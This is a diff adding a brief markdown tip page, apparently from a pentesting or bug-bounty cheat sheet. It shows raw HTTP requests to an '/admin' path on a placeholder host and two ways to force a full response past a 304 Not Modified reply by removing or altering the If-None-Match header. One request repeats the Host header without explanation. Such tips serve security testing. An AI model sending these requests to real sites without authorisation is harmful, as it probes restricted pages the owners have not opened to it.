| 1 | + | # 304 Not Modified Bypass |
| 2 | + | |
| 3 | + | 1. Delete "If-None-Match" header |
| 4 | + | ``` |
| 5 | + | GET /admin HTTP/1.1 |
| 6 | + | Host: target.com |
| 7 | + | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" |
| 8 | + | ``` |
| 9 | + | Try this to bypass |
| 10 | + | ``` |
| 11 | + | GET /admin HTTP/1.1 |
| 12 | + | Host: target.com |
| 13 | + | ``` |
| 14 | + | |
| 15 | + | 2. Adding random character in the end of "If-None-Match" header |
| 16 | + | ``` |
| 17 | + | GET /admin HTTP/1.1 |
| 18 | + | Host: target.com |
| 19 | + | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" |
| 20 | + | ``` |
| 21 | + | Try this to bypass |
| 22 | + | ``` |
| 23 | + | GET /admin HTTP/1.1 |
| 24 | + | Host: target.com |
| 25 | + | Host: target.com |
| 26 | + | If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b |
| 27 | + | ``` |
| 28 | + | |
| 29 | + | Source: [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) |
| 30 | + | |